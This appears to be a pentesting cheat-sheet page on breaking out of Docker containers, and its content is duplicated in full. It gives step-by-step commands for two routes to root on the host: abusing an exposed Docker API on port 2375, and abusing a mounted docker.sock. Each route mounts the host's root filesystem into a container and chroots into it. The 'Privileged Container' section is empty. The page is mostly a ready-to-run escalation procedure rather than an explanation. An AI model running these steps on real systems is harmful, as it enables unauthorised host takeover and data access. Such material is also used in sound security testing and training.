Docker Breakouts

Misconfigured Docker Socket

//docker daemon is configured to listen on 2375 and 2376(encrypted) for API request
netstat -tlp

//verify if daemon is running below command shows docker info
curl localhost:2375/version | python3 -m json.tool

//Configure docker client to use the TCP Socket
export DOCKER_HOST="tcp://localhost:2375"

//now you can list docker images
docker images


//Mount root filesystem of host machine on /host directory of the container.
docker run -it -v /:/host/ ubuntu(respository):18.04(TAG) bash

//change to /host dir to list files
cd /host/
ls -l


//Use chroot on the /host directory.
chroot ./ bash

//now you broke out container and can execute commands on host
ps -eaf
find / -name searchquery 2>/dev/null

Mounted Docker Socket

//Search for docker socket.
find / -name docker.socket 2>/dev/null


//By default docker client is configured to use /var/run/docker.sock unix socket which is a symlink
to /run/docker.sock.

//now you can list docker images
docker images


//Mount root filesystem of host machine on /host directory of the container.
docker run -it -v /:/host/ ubuntu(respository):18.04(TAG) bash

//change to /host dir to list files
cd /host/
ls -l


//Use chroot on the /host directory.
chroot ./ bash

//now you broke out container and can execute commands on host
ps -eaf
find / -name searchquery 2>/dev/null

Privileged Container

References

PreviousDocker Basics NextCloud

Last updated 4 years ago

Was this helpful?

Docker Breakouts

Misconfigured Docker Socket

//docker daemon is configured to listen on 2375 and 2376(encrypted) for API request
netstat -tlp

//verify if daemon is running below command shows docker info
curl localhost:2375/version | python3 -m json.tool

//Configure docker client to use the TCP Socket
export DOCKER_HOST="tcp://localhost:2375"

//now you can list docker images
docker images


//Mount root filesystem of host machine on /host directory of the container.
docker run -it -v /:/host/ ubuntu(respository):18.04(TAG) bash

//change to /host dir to list files
cd /host/
ls -l


//Use chroot on the /host directory.
chroot ./ bash

//now you broke out container and can execute commands on host
ps -eaf
find / -name searchquery 2>/dev/null

Mounted Docker Socket

//Search for docker socket.
find / -name docker.socket 2>/dev/null


//By default docker client is configured to use /var/run/docker.sock unix socket which is a symlink
to /run/docker.sock.

//now you can list docker images
docker images


//Mount root filesystem of host machine on /host directory of the container.
docker run -it -v /:/host/ ubuntu(respository):18.04(TAG) bash

//change to /host dir to list files
cd /host/
ls -l


//Use chroot on the /host directory.
chroot ./ bash

//now you broke out container and can execute commands on host
ps -eaf
find / -name searchquery 2>/dev/null

Privileged Container

References

https://guif.re/linuxeopguif.re

Docker Privilege Escalation - Hacking ArticlesHacking Articles

PreviousDocker Basics NextCloud

Last updated 4 years ago

Was this helpful?